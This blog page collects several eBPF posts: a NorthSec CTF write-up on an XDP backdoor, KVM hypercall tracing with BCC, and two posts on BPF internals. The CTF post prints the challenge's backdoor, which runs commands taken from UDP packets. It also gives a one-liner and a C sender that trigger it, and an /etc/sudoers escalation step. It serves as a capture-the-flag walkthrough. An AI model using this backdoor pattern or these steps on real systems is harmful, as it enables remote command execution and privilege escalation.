An entertaining eBPF XDP adventure

In this post, I discuss the CTF competition track of NorthSec, an awesome security conference, and specifically our tale of collecting two elusive flags that happened to be based on eBPF XDP technology – something that is bleeding edge and uber cool!

In case you did not know, the eBPF-based eXpress Data Path (XDP) is redefining how network traffic is handled on devices. Filtering, routing and reshaping incoming packets at a very early stage – even before they enter the networking stack of the Linux kernel – allows unprecedented speed and provides a base for applications in the security (DDoS mitigation), networking and performance domains. There is a lot of material from Quentin Monnet, Julia Evans, and the Cilium and IOVisor projects about what eBPF/XDP is capable of. For the uninitiated, generic information about eBPF can also be found on Brendan Gregg's eBPF page and the links therein. If you think you want to get serious about this, here are some more links and detailed docs. In a recent talk I gave, I showed a diagram similar to the one below, as I started teasing out the possible avenues beyond the performance monitoring and tracing use case that is dear to my heart:

cls-xdp
TC with cls_bpf and XDP. Actions on packet data are taken at the driver level in XDP

The full presentation is here. So, what's interesting here is that incoming packets from the net device can now be statefully filtered or manipulated even before they reach the network stack. This has been made possible by the use of extended Berkeley Packet Filter (eBPF) programs, which allow such low-level actions at the driver level to be flexibly programmed in a safe manner from userspace. The programming is done in a restricted-C syntax that gets compiled to BPF bytecode by LLVM/Clang. The bpf() syscall then allows the bytecode to be sent to the kernel at the proper place – here, these are the 'hooks' at the ingress and egress of raw packets. Before getting attached, the program goes through a very strict verifier and an efficient JIT compiler that converts the BPF program to native machine code (which is what makes eBPF pretty fast).

Unlike the register-struct context for eBPF programs attached to kprobes, the context passed to XDP eBPF programs is the XDP metadata struct. The data is directly read and parsed from within the BPF program, reshaped if required, and an action is taken on it. The action can be XDP_PASS, where the packet is passed on to the network stack as seen in the diagram; XDP_DROP, where it is dropped by essentially sending it back to the driver queue; or XDP_TX, which sends the packet back to the NIC it came from. While PASS and DROP can be good in scenarios such as filtering IPs, ports and packet contents, the TX use case is better suited to load balancing, where the packet contents can be modified and transmitted back to the NIC. Currently, Facebook is exploring its use and presented their XDP-based load balancing and DDoS prevention framework at the recent Netdev 2.1 in Montreal. The Cilium project is another example of XDP's use in container networking and security, and is an important project resulting from the eBPF tech.
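
Before moving on, here is what a trivial XDP program of this kind can look like – a minimal sketch in the style of the kernel's samples/bpf XDP examples (the program and object file names are made up, and bpf_helpers.h from that directory is assumed for the SEC() macro). It parses the Ethernet header from the xdp_md context and keeps only IPv4 traffic:

/* A minimal sketch in the style of the kernel's samples/bpf XDP examples;
 * bpf_helpers.h from that directory is assumed for the SEC() macro. */
#define KBUILD_MODNAME "xdp_sketch"
#include <uapi/linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include "bpf_helpers.h"

SEC("xdp")
int xdp_keep_only_ipv4(struct xdp_md *ctx)
{
    /* The packet is described by two offsets in the xdp_md context */
    void *data = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;
    struct ethhdr *eth = data;

    /* The verifier insists on an explicit bounds check before any access */
    if ((void *)(eth + 1) > data_end)
        return XDP_ABORTED;

    /* Keep IPv4, drop everything else right at the driver */
    if (eth->h_proto == htons(ETH_P_IP))
        return XDP_PASS;

    return XDP_DROP;
}

char _license[] SEC("license") = "GPL";

If I remember the iproute2 syntax correctly, something like ip link set dev eth0 xdp obj xdp_sketch.o sec xdp should attach it to an interface.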

NorthSec BPF Flag – Take One

Ok, enough of XDP basics for now. Coming back to the curious case of a fancy CTF challenge at NorthSec, we were presented with a VM and told that "Strange activity has been detected originating from the rao411 server, but our team has been unable to understand from where the commands are coming from, we need your help." It was also explicitly stated that the machine was an up-to-date Ubuntu 17.04 with an unmodified kernel. Well, for me that is a pretty decent hint that this challenge would require some kernel sorcery. Simon checked /var/log/syslog and saw suspicious prints every minute or two showing that the /bin/true command was being run. Pretty strange. We sat together and tried to use netcat to listen for network chatter on multiple ports, as we guessed that something was being sent from outside to the rao411 server. Was it possible that the packets were somehow being dropped even before they reached the network stack? We quickly realized that what we were seeing was indeed related to BPF, as we saw some files lying around in the VM which looked like these (post CTF event, Julien Desfossez, who designed the challenge, has been generous enough to provide the code, which itself is based on Jesper Dangaard Brouer's code in the kernel source tree). As we can see, there are the familiar helper functions used for loading BPF programs and manipulating BPF maps. Apart from that, there was the xdp_nsec_kern.c file which contained the BPF program itself! A pretty decent start it seems 🙂 Here is the code for the parse_port() function in the BPF XDP program that is eventually called when a packet is encountered:


u32 parse_port(struct xdp_md *ctx, u8 proto, void *hdr)
{
    void *data_end = (void *)(long)ctx->data_end;
    struct udphdr *udph;
    u32 dport;
    char *cmd;
    unsigned long payload_offset;
    unsigned long payload_size;
    char *payload;
    u32 key = 0;

    if (proto != IPPROTO_UDP) {
        return XDP_PASS;
    }

    /* Bounds check the UDP header before touching it (verifier requirement) */
    udph = hdr;
    if (udph + 1 > data_end) {
        return XDP_ABORTED;
    }

    payload_offset = sizeof(struct udphdr);
    payload_size = ntohs(udph->len) - sizeof(struct udphdr);

    dport = ntohs(udph->dest);
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }

    if ((hdr + payload_offset + CMD_SIZE) > data_end) {
        return XDP_ABORTED;
    }

    /* Copy the first CMD_SIZE bytes of the UDP payload into the 'nsec' map */
    cmd = bpf_map_lookup_elem(&nsec, &key);
    if (!cmd) {
        return XDP_PASS;
    }
    memset(cmd, 0, CMD_SIZE);
    payload = &((char *) hdr)[payload_offset];
    cmd[0] = payload[0];
    cmd[1] = payload[1];
    cmd[2] = payload[2];
    cmd[3] = payload[3];
    cmd[4] = payload[4];
    cmd[5] = payload[5];
    cmd[6] = payload[6];
    cmd[7] = payload[7];
    cmd[8] = payload[8];
    cmd[9] = payload[9];
    cmd[10] = payload[10];
    cmd[11] = payload[11];
    cmd[12] = payload[12];
    cmd[13] = payload[13];
    cmd[14] = payload[14];
    cmd[15] = payload[15];

    return XDP_PASS;
}

Hmmm… this is a lot of information. First, we observe that the destination port is extracted from the UDP header by the BPF program, and the packets are only passed if the destination port is CMD_PORT (which turns out to be 9000, as defined in the header xdp_nsec_common.h). Note that the XDP actions happen very early, hence even if we were to listen on port 9000 using netcat, we would not see any activity. Another pretty interesting thing is that some payload from the packet is being used to prepare a cmd string. What could that be? Why would somebody prepare a command from a UDP packet? 😉

Let's dig deeper. So, /var/log/syslog was saying that xdp_nsec_cmdline was being executed intermittently, running /bin/true. Maybe there is something in that file? A quick glimpse at xdp_nsec_cmdline.c confirms our line of thought! Here is a snippet from its main() function:

int main(int argc, char **argv)
{
.
.
    cmd = malloc(CMD_SIZE * sizeof(char));
    fd_cmd = open_bpf_map(file_cmd);

    memset(cmd, 0, CMD_SIZE);
    ret = bpf_map_lookup_elem(fd_cmd, &key, cmd);
    printf("cmd: %s, ret = %d\n", cmd, ret);
    close(fd_cmd);
    ret = system(cmd);
.
.
}

The program opens the pinned BPF map file_cmd (which is actually /sys/fs/bpf/nsec), looks up the stored value and executes it. Such Safe. Much Wow. It seems we are very close. We just need to craft a UDP packet that updates the map with a command in its payload. The first flag was a file called flag which was not accessible to the logged-in raops user. So we just made a script in /tmp which changed the permissions of that file, and sent a UDP packet containing the path to our script.

Trivia! Bash can send UDP packets on its own, through the /dev/udp pseudo-device:
echo -n "/tmp/a.sh" > /dev/udp/<rao411 IP>/9000

So, we now just had to wait for xdp_nsec_cmdline to run, which would trigger our script. And of course it worked! We opened the flag and submitted it. 6 points to InfoSecs!
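
For the curious, the same packet can also be crafted with a few lines of plain C sockets code instead of the bash redirection – just a sketch, with a placeholder SERVER_IP standing in for the rao411 server's address:

/* Sketch of a minimal UDP sender for the command payload.
 * SERVER_IP is a placeholder; /tmp/a.sh was our permission-changing script. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define SERVER_IP "192.0.2.1"   /* placeholder address */
#define CMD_PORT  9000

int main(void)
{
    const char payload[] = "/tmp/a.sh";
    struct sockaddr_in dst = {
        .sin_family = AF_INET,
        .sin_port = htons(CMD_PORT),
    };
    int fd = socket(AF_INET, SOCK_DGRAM, 0);

    if (fd < 0)
        return 1;
    inet_pton(AF_INET, SERVER_IP, &dst.sin_addr);
    /* The XDP program copies the first CMD_SIZE bytes of the UDP payload
     * into the pinned map, so the path string is all we need to send. */
    sendto(fd, payload, strlen(payload), 0,
           (struct sockaddr *)&dst, sizeof(dst));
    close(fd);
    return 0;
}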

NorthSec BPF Flag – Take Two

Of course, our immediate next action was to add the raops user to /etc/sudoers 😉 Once we had root access, we could recompile and re-insert the BPF program as we wished. Simon observed an interesting check in the BPF XDP program listed above that raised our eyebrows:

...
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }
...

Why would someone want to explicitly drop packets coming in on port 9001? Unless… there was a message being sent to that port from outside! While not an elegant approach, we just disabled the XDP_DROP check so that the packets would reach the network stack and we could simply netcat the data on that port. Recompile, re-insert and it worked! The flag was indeed being sent to port 9001, which was no longer being dropped. 8 points to InfoSecs!
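
For reference, the patched check looked roughly like this – we simply turned the drop into a pass (removing the branch entirely would have worked just as well):

    /* Our quick hack: let CMD_PORT + 1 (9001) reach the network stack
     * instead of being dropped at the driver, so netcat can see it. */
    if (dport == CMD_PORT + 1) {
        return XDP_PASS;   /* was XDP_DROP */
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }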

Mandatory cool graphic of us working

I really enjoyed this gamification of advanced kernel tech, as it increases its reach to young folks interested in Linux kernel internals and modern networking technologies. Thanks to Simon Marchi for seeing this through with me and to Francis Deslauriers for pointing out the challenge to us! Also, thanks to the NorthSec team (esp. Julien Desfossez and Michael Jeanson) who designed this challenge and made the competition more fun for me! In fact, Julien started on this while watching the XDP talks at Netdev 2.1. Also, thanks to the wonderful lads Marc-Andre, Ismael, Felix, Antoine and Alexandre from the University of Sherbrooke who kept the flag-chasing momentum going 🙂 It was a fun weekend! That's all for now. If I get some more time, I'll write about an equally exciting LTTng CTF (Common Trace Format) challenge which Simon cracked while I watched from the sidelines.

EDIT : Updated the above diagram to clarify that XDP filtering happens early at the driver level – even before TC ingress and egress. TC with cls_bpf also allows BPF programs to be run. This was indeed a precursor to XDP.


Analyzing KVM Hypercalls with eBPF Tracing

I still visit my research lab quite often. It's always nice to be in a zone where the boundaries of knowledge are being pushed further and excitement is in the air. I like this ritual, as this is a place where one can discuss Linux kernel code and the philosophy of life all in a single sentence, while we quietly sip from our hipster coffee cups.

In the lab, Abder is working these days on some cool hypercall stuff. The exact details of his work are quite complex, but he calls his tool hypertrace. I think I am sold on the name already. Hypercalls are like syscalls, but instead of going to the kernel, such calls are made from the guest to the hypervisor with arguments and an identifier value (just like syscalls). The hypervisor then brokers the privileged operation for the guest. Pretty neat. Here is some kernel documentation on hypercalls.

So Abder steered one recent discussion towards the internals of KVM and wanted to know the latency caused by a hypercall he was introducing for his experiments (as I said, he is introducing a new hypercall with an id – for example 42). His analysis use case was quite specific – he wanted to trace the kvm_exit -> kvm_hypercall -> kvm_entry sequence to know the exact latency he was causing over a given duration. In addition, the tracing overhead had to be minimal, and the tracing itself was needed only for a short time. The tracepoint part is somewhat trivial: these 3 tracepoints are already in the kernel and he could latch on to them. Essentially, he needs to look at the exit_reason argument of the kvm_exit tracepoint and check that it is a VMCALL (18), which denotes that a hypercall is coming up next. Then he could look at the following kvm_entry event and compute the time delta to get the latency.

Even though traditional tracers such as LTTng and Ftrace can record these events, Abder was only interested in his specific hypercall (nr = 42), along with the kvm_exit that happened before it (with exit_reason = 18) and the kvm_entry after it. This is not straightforward: it is not possible to do such specific tracing with traditional tracers at high speed and low overhead. This means the selection of events cannot just be a simple filter – it has to be stateful. Just when Abder was about to embark on a journey of kprobes and kernel modules, I once more got the opportunity of being Morpheus and said "What if I told you…

The rest is history. (dramatic pause)

Jokes apart, here is a small demo of an eBPF/BCC script that hooks onto the 3 aforementioned tracepoints in the Linux kernel and conditionally records the trace events:

from __future__ import print_function
from bcc import BPF

# load BPF program
b = BPF(text="""
#define EXIT_REASON 18
BPF_HASH(start, u8, u8);

TRACEPOINT_PROBE(kvm, kvm_exit) {
    u8 e = EXIT_REASON;
    u8 one = 1;
    if (args->exit_reason == EXIT_REASON) {
        bpf_trace_printk("KVM_EXIT exit_reason : %d\\n", args->exit_reason);
        start.update(&e, &one);
    }
    return 0;
}

TRACEPOINT_PROBE(kvm, kvm_entry) {
    u8 e = EXIT_REASON;
    u8 zero = 0;
    u8 *s = start.lookup(&e);
    if (s != NULL && *s == 1) {
        bpf_trace_printk("KVM_ENTRY vcpu_id : %u\\n", args->vcpu_id);
        start.update(&e, &zero);
    }
    return 0;
}

TRACEPOINT_PROBE(kvm, kvm_hypercall) {
    u8 e = EXIT_REASON;
    u8 zero = 0;
    u8 *s = start.lookup(&e);
    if (s != NULL && *s == 1) {
        bpf_trace_printk("HYPERCALL nr : %d\\n", args->nr);
    }
    return 0;
}
""")

# header
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "EVENT"))

# format output
while 1:
    try:
        (task, pid, cpu, flags, ts, msg) = b.trace_fields()
    except ValueError:
        continue

    print("%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))

The TRACEPOINT_PROBE() interface in BCC allows us to use static tracepoints in the kernel. For example, whenever a kvm_exit occurs in the kernel, the first probe is executed and it records the event if the exit reason was VMCALL. At the same time it updates a BPF hash map, which basically acts as a flag here for the other events. I recommend checking out Lesson 12 from the BCC Python Developer Tutorial if this seems interesting to you 🙂 In addition, the reference guide lists the most important C and Python APIs for BCC.

To test the above example out, we can introduce our own hypercall in the VM using this small test program :

/* 0x0F 0x01 0xC1 is the raw encoding of the VMCALL instruction */
#define do_hypercall(nr, p1, p2, p3, p4) \
__asm__ __volatile__(".byte 0x0F,0x01,0xC1\n"::"a"(nr), \
    "b"(p1), \
    "c"(p2), \
    "d"(p3), \
    "S"(p4))

int main(void)
{
    do_hypercall(42, 0, 0, 0, 0);
    return 0;
}

While the BPF program is running, if we do a hypercall, we get the following output :

TIME(s)            COMM             PID    EVENT
1795.472072000     CPU 0/KVM        7288   KVM_EXIT exit_reason : 18
1795.472112000     CPU 0/KVM        7288   HYPERCALL nr : 42
1795.472119000     CPU 0/KVM        7288   KVM_ENTRY vcpu_id : 0

So we see how, in a few minutes, we could precisely gather only those events that were of interest to us – saving us the hassle of setting up other traces or kernel modules. eBPF/BCC-based analysis allowed us to conditionally trace only a certain subsection of events instead of the huge flow of events that we would have had to analyze offline. KVM internals are like a dark dungeon and I feel as if I am embarking on a quest here. There is a lot more KVM-related analysis we are doing with eBPF/BCC. Stay tuned for updates! If you find any more interesting use cases for eBPF in the meantime, let me know. I would love to try them out! As always, comments, corrections and criticisms are welcome.

BPF Internals – II

Continuing from where I left off before, in this post we will see some of the major changes in BPF that have happened recently – how it is evolving into a very stable and accepted in-kernel VM and can probably be the next big thing – not just in filtering, but beyond. From what I observe, the most attractive feature of BPF is that it gives developers the ability to execute dynamically compiled code within the kernel – in a limited context, but still securely. This in itself is a valuable asset.

As we have seen already, the use of BPF is not limited to filtering network packets; it is also used for seccomp, tracing etc. The eventual step for BPF in such a scenario was to evolve beyond its use in the network filtering world. To improve the architecture and bytecode, lots of additions have been proposed. I started a bit late, when I saw Alexei's patches for kernel version 3.17-rcX. Perhaps this was the relevant mail by Alexei that got me interested in the upcoming changes. So, here is a summary of the major changes that have occurred. We will look at each of them in sufficient detail.

Architecture

The classic BPF we discussed in the last post had two 32-bit registers – A and X. All arithmetic operations were supported and performed using these two registers. The newer BPF, called extended BPF or eBPF, has ten 64-bit registers and supports arbitrary loads/stores. It also contains new instructions like BPF_CALL, which can be used to call some new kernel-side helper functions. We will look into this in detail a bit later as well. The new eBPF follows calling conventions which are closer to those of modern machines (x86_64). Here is the mapping of the new eBPF registers to x86 registers:

R0  - rax     return value from function
R1  - rdi     1st argument
R2  - rsi     2nd argument
R3  - rdx     3rd argument
R4  - rcx     4th argument
R5  - r8      5th argument
R6  - rbx     callee saved
R7  - r13     callee saved
R8  - r14     callee saved
R9  - r15     callee saved
R10 - rbp     frame pointer

The closeness to the machine ABI also ensures that unnecessary register spilling/copying can be avoided. The R0 register stores the return value of the eBPF program, and the eBPF program context can be loaded through register R1. Earlier, there used to be just two jump targets, i.e. a jump to either the TRUE or the FALSE target. Now, there can be arbitrary jump targets – true or fall-through. Another aspect of the eBPF instruction set is its ease of use with the in-kernel JIT compiler: eBPF registers and most instructions now map one-to-one to hardware registers and instructions. This makes emitting eBPF instructions from any external compiler (in userspace) not such a daunting task. Of course, prior to any execution, the generated bytecode is passed through a verifier in the kernel to check its sanity. The verifier is in itself a very interesting and important piece of code, and probably a story for another day.

Building BPF Programs

From a user's perspective, the new eBPF bytecode can now be another headache to generate. But fear not, an LLVM-based backend now supports generating instructions for the BPF pseudo-machine type directly. It is graduating from being just an experimental backend and could hit the shelves anytime soon. In the meantime, you can always use this script to set up the BPF-supporting LLVM yourself. But then, what next? A BPF program (not necessarily just a filter anymore) can be written in two parts – a kernel part (the BPF bytecode which will get loaded in the kernel) and a userspace part (which may, if needed, gather data from the kernel part). Currently you can specify an eBPF program in a restricted C-like language. For example, here is a program in that restricted C which returns true if the first argument of the input program context is 42. Nothing fancy:

#include <include/bpf.h>

int answer(struct bpf_context *ctx)
{
    int life;
    life = ctx->arg1;

    if (life == 42){
        return 1;
    }
    return 0;
}

This C-like syntax generates a BPF binary which can then be loaded into the kernel. Here is what it looks like in BPF 'assembly' representation, as generated by the LLVM backend (supplied with LLVM 3.4):

        .text
        .globl  answer
        .align  8
answer:                                 # @answer
# BB#0:
        ldw     r1, 0(r1)
        mov     r0, 1
        mov     r2, 42
        jeq     r1, r2 goto .LBB0_2
# BB#1:
        mov     r0, 0
.LBB0_2:
        andi    r0, 1
        ret

If you are adventurous enough, you can also probably write complete and valid BPF programs in assembly in a single go – right from your userspace program. I do not know if this is of any use these days. I have done this some time back for a moderately elaborate trace filtering program though. It is not very effective either, because I think at this point in human history, LLVM can generate assembly better and more efficiently than a human.

What we discussed just now is probably not a relevant program anymore. An example by Alexei here is more relevant these days. With the integration of kprobes with BPF, a BPF program can be run at any valid dynamically instrumentable function in the kernel. So now, we can just use pt_regs as the context and get individual register values each time the probe is hit. Some helper functions are also available in BPF which can, for example, get the current timestamp. You can have a very cheap tracing tool right there 🙂
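
As a taste of that, here is a small sketch of such a program in the samples/bpf restricted-C style (bpf_helpers.h is assumed for SEC() and the helper prototypes; the probed function and message are arbitrary). It grabs a timestamp with a helper every time the kprobe fires:

/* Sketch of a kprobe-attached BPF program in samples/bpf style; assumes
 * bpf_helpers.h for SEC(), bpf_ktime_get_ns() and bpf_trace_printk(). */
#include <linux/ptrace.h>
#include <linux/types.h>
#include <linux/version.h>
#include <uapi/linux/bpf.h>
#include "bpf_helpers.h"

SEC("kprobe/sys_clone")
int trace_clone(struct pt_regs *ctx)
{
    /* The context here is simply the saved register state at the probe */
    u64 ts = bpf_ktime_get_ns();
    char fmt[] = "sys_clone hit at %llu ns\n";

    bpf_trace_printk(fmt, sizeof(fmt), ts);
    return 0;
}

char _license[] SEC("license") = "GPL";
u32 _version SEC("version") = LINUX_VERSION_CODE;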

BPF Maps

I think one of the most interesting features in this new eBPF is BPF maps. They look like an abstract data type – initially a hash table, but from kernel 3.19 onwards support for array maps seems to have been added as well. These bpf_maps can be used to store data generated by an executing eBPF program. You can see the implementation details in arraymap.c or hashtab.c. Let's pause for a while and look at some more magic added in eBPF – especially the BPF syscall, which forms the primary interface for the user to interact with and use eBPF. The reason we want to know more about this syscall is to learn how to work with these cool BPF maps.

BPF Syscall

Another nice thing about eBPF is the new syscall that has been added to make life easier while dealing with BPF programs. In an article on LWN last year, Jonathan Corbet discussed the BPF syscall. For example, to load a BPF program you could call

syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));

with, of course, the corresponding bpf_attr structure having been filled in beforehand:

union bpf_attr attr = {
    .prog_type = prog_type, /* kprobe filter? socket filter? */  
    .insns = ptr_to_u64((void *) insns), /* complete bpf instructions */
    .insn_cnt = prog_len / sizeof(struct bpf_insn), /* how many? */
    .license = ptr_to_u64((void *) license), /* GPL maybe */
    .log_buf = ptr_to_u64(bpf_log_buf), /* log buffer */
    .log_size = LOG_BUF_SIZE,
    .log_level = 1,
};

Yes, this may seem cumbersome to some, so for now there are some wrapper functions in bpf_load.c and libbpf.c to help folks out, where you need not give too many details about your compiled BPF program. Much of what happens in the BPF syscall is determined by the arguments supplied here. To elaborate, let's see how to load the BPF program we wrote before. Assuming that we have the sample program compiled to its BPF bytecode form and now want to load it up, we take the help of the wrapper function load_bpf_file(), which parses the BPF ELF file and extracts the BPF bytecode from the relevant section. It also iterates over all ELF sections to get licence info, map info etc. Eventually, based on the type of BPF program – kprobe/kretprobe or socket program – and the info and bytecode just gathered from the ELF parsing, the bpf_attr structure is filled and the actual syscall is made.
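
A user of these wrappers barely sees any of that machinery; the userspace side of a samples/bpf style program can be as small as this sketch (load_bpf_file(), prog_fd[] and map_fd[] come from bpf_load.h in the kernel samples, bpf_log_buf from libbpf.h, and the object file name is made up):

/* Userspace loader sketch using the helpers from the kernel's samples/bpf
 * directory; "sample_kern.o" is a made-up object file name. */
#include <stdio.h>
#include "libbpf.h"
#include "bpf_load.h"

int main(void)
{
    /* Parses the ELF file, fills bpf_attr for each section it understands
     * and issues the BPF_MAP_CREATE / BPF_PROG_LOAD syscalls. */
    if (load_bpf_file("sample_kern.o")) {
        printf("%s", bpf_log_buf);   /* verifier complaints land here */
        return 1;
    }

    printf("program fd = %d, first map fd = %d\n", prog_fd[0], map_fd[0]);
    /* ... interact with the maps or read trace output here ... */
    return 0;
}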

Creating and accessing BPF maps

Coming back to the maps: apart from this simple syscall to load the BPF program, there are many more actions that can be taken based on just the arguments. Have a look at bpf/syscall.c. From the userspace side, the new BPF syscall comes to the rescue and allows most of these operations on bpf_maps to be performed! From the kernel side, however, with some special helper functions and the use of the BPF_CALL instruction, the values in these maps can be updated/deleted/accessed etc. These helpers in turn call the actual function according to the type of map – a hash map or an array. For example, here is a BPF program that just creates an array map and does nothing else:

#include <uapi/linux/bpf.h>
#include "bpf_helpers.h"
#include <linux/version.h>

struct bpf_map_def SEC("maps") sample_map = { 
    .type = BPF_MAP_TYPE_ARRAY,
    .key_size = sizeof(u32),
    .value_size = sizeof(unsigned int),
    .max_entries = 1000,
};

char _license[] SEC("license") = "GPL";
u32 _version SEC("version") = LINUX_VERSION_CODE;

When loaded in the kernel, the array map is created. From userspace we can then initialize the map with some values using a function that looks like this:

static void init_array() 
{
    int key;
    for (key = 0; key < 1000; key++) {
        bpf_update_elem(map_fd[0], &key, &value1, BPF_ANY);
    }
}

where the bpf_update_elem() wrapper in turn calls the BPF syscall with the proper arguments and attributes:

syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));

This in turn calls map_update_elem(), which securely copies the key and value using copy_from_user() and then calls the specialized function for updating the value of the array map at the specified index. Similar things happen for reading/deleting/creating hash or array maps from userspace.
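
On the kernel side, the same map can be touched from within the BPF program through those helpers. A sketch that bumps a counter in the sample_map defined earlier might look like this (it would sit in the same kernel-side source file, with bpf_helpers.h and <linux/ptrace.h> included; the kprobe attach point is just an arbitrary example):

/* Sketch: bumping a counter in sample_map from inside the BPF program.
 * The helper call below compiles to a BPF_CALL into the kernel's
 * array-map implementation. */
SEC("kprobe/sys_write")
int count_writes(struct pt_regs *ctx)
{
    u32 key = 0;             /* one slot of the 1000-entry array */
    unsigned int *value;

    value = bpf_map_lookup_elem(&sample_map, &key);
    if (value)               /* the verifier insists on this NULL check */
        __sync_fetch_and_add(value, 1);
    return 0;
}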

So things will probably start falling into place now from the earlier post by Brendan Gregg, where he was updating a map from the BPF program (using the BPF_CALL instruction, which calls the internal kernel helpers) and then concurrently accessing it from userspace to generate a beautiful histogram (through the syscall I just mentioned above). BPF maps are indeed a very powerful addition to the system. You can also check out more detailed and complete examples now that you know what is going on. To summarize, this is how an example BPF program, written in restricted C for the kernel part and normal C for the userspace part, would run these days:

eBPF-session

In the next BPF post, I will discuss the eBPF verifier in detail. This is the most crucial part of BPF and deserves detailed attention, I think. There is also something cool happening these days on the Plumgrid side – the BPF Compiler Collection. There was a very interesting demo of the power of eBPF using such tools at the recent Red Hat Summit. I got BCC working and tried out some examples with probes – where I could easily compile and load BPF programs from my Python scripts! How cool is that 🙂 Also, I have been digging through LTTng's interpreter lately, so another post detailing how the BPF and LTTng interpreters work would probably be nice too. That's all for now. Run BPF.

BPF Internals – I

A recent post by Brendan Gregg inspired me to write my own blog post about my findings on how the Berkeley Packet Filter (BPF) evolved, its interesting history and the immense powers it holds – which Brendan calls 'brutal'. I came across this while studying interpreters and small process virtual machines like the proposed KTap VM. I was looking at some known papers on register- vs stack-based VMs, their performance and the various code dispatch mechanisms used in these small VMs. The review of the state of the art soon moved to native code compilation, and a discussion on LWN caught my eye. The benefits of JIT were too good to be overlooked, and BPF's application in things like filtering, tracing and seccomp (used in Chrome as well) got me interested. I knew that the kernel devs were on to something here. This is when I started digging through the BPF background.

Background

Network packet analysis requires an interesting bunch of tech, right from the time a packet reaches the embedded controller on the network hardware in your PC (hardware/data link layer) to the point it does something useful in your system, such as displaying something in your browser (application layer). With the connected systems evolving these days, the amount of data transferred is huge, and the support infrastructure for network analysis needed a way to filter things out pretty fast. The initial concepts of packet filtering were developed keeping such needs in mind, and many strategies were discussed for each filter, such as the CMU/Stanford Packet Filter (CSPF), Sun's NIT filter and so on. For example, some earlier filtering approaches (as in CSPF) used a tree-based model to represent filters and evaluated them by predicate-tree walking. This earlier approach was also inherited by the Linux kernel's old filter in the net subsystem.

Consider an engineer's need for a probably simple and unrealistic filter on network packets with the predicates P1, P2, P3 and P4:

equation

A filtering approach like the one in CSPF would have represented this filter in an expression tree structure as follows:

tree

It is then trivial to walk the tree, evaluating each expression and performing operations on each of them. But this would mean there can be extra costs associated with evaluating predicates which may not necessarily have to be evaluated. For example, what if the packet is neither an ARP packet nor an IP packet? Knowing that the P1 and P2 predicates are untrue, we need not evaluate the other 2 predicates and perform 2 more boolean operations on them to determine the outcome.

In 1992-93, McCanne et al. proposed the BSD Packet Filter with a new CFG-bytecode-based filter design. This was an in-kernel approach where a tiny interpreter would evaluate expressions represented as BPF bytecode. Instead of simple expression trees, they proposed a CFG-based filter design. One possible control flow graph representation of the same filter above is:

cfg

The evaluation can start from P1; the right edge is for FALSE and the left for TRUE, with each predicate being evaluated in this fashion until the evaluation reaches the final result of TRUE or FALSE. The CFG has an inherent property of 'remembering': if P1 and P2 are false, the fact that the path reaches a final FALSE is remembered, and P3 and P4 need not be evaluated. This was then easy to represent in bytecode form, where a minimal BPF VM can be designed to evaluate these predicates with jumps to TRUE or FALSE targets.

The BPF Machine

A pseudo-instruction representation of the same filter described above, for earlier versions of BPF in the Linux kernel, looks like this:

l0:     ldh [12]
l1:     jeq #0x800, l3, l2
l2:     jeq #0x805, l3, l8
l3:     ld [26]
l4:     jeq #SRC, l5, l8
l5:     ld len
l6:     jlt 0x400, l7, l8
l7:     ret #0xffff
l8:     ret #0

To know how to read these BPF instructions, look at the filter documentation in the kernel source and see what each line does. Each of these instructions is actually just bytecode which the BPF machine interprets. Like all real machines, this requires a definition of what the VM internals look like. In the BPF-based in-kernel filtering technique the Linux kernel adopted, there were initially just 2 important registers, A and X, with another 16-register 'scratch space' M[0-15]. The instruction format and some sample instructions for this earlier version of BPF are shown below:

/* Instruction format: { OP, JT, JF, K }
 * OP: opcode, 16 bit
 * JT: Jump target for TRUE
 * JF: Jump target for FALSE
 * K: 32 bit constant
 */

/* Sample instructions*/
{ 0x28,  0,  0, 0x0000000c },     /* 0x28 is opcode for ldh */
{ 0x15,  1,  0, 0x00000800 },     /* if A == 0x800, skip the next instr (jt = 1) */
{ 0x15,  0,  5, 0x00000805 },     /* jump to FALSE (offset 5) if A != 0x805 */
..

There were some radical changes made to the BPF infrastructure recently – extensions to its instruction set and registers, the addition of things like BPF maps, etc. We shall discuss those changes in detail, probably in the next post in this series. For now we'll just see the good ol' way of how BPF worked.

Interpreter

Each of the instructions seen above is represented as an array of these 4 values, and each program is an array of such instructions. The BPF interpreter sees each opcode and performs the operations on the registers or data accordingly, after the program has gone through a verifier for a sanity check to make sure the filter code is secure and would not cause harm. The program, which consists of these instructions, then passes through a dispatch routine. As an example, here is a small snippet from the BPF instruction dispatch for the 'add' instruction, before it was restructured in Linux kernel v3.15 onwards:

127         u32 A = 0;                      /* Accumulator */
128         u32 X = 0;                      /* Index Register */
129         u32 mem[BPF_MEMWORDS];          /* Scratch Memory Store */
130         u32 tmp;
131         int k;
132
133         /*
134          * Process array of filter instructions.
135          */
136         for (;; fentry++) {
137 #if defined(CONFIG_X86_32)
138 #define K (fentry->k)
139 #else
140                 const u32 K = fentry->k;
141 #endif
142 
143                 switch (fentry->code) {
144                 case BPF_S_ALU_ADD_X:
145                         A += X;
146                         continue;
147                 case BPF_S_ALU_ADD_K:
148                         A += K;
149                         continue;
150 ..

The above snippet is taken from net/core/filter.c in Linux kernel v3.14. Here, fentry is the sock_filter structure (the current instruction) and the filter is applied to the sk_buff data element. The dispatch loop (136) runs till all the instructions are exhausted. The dispatch is basically a huge switch-case, with each opcode being tested (143) and the necessary action being taken. For example, an 'add' operation on registers would compute A + X and store it in A. Simple, isn't it? Let us take it a level above.

JIT Compilation

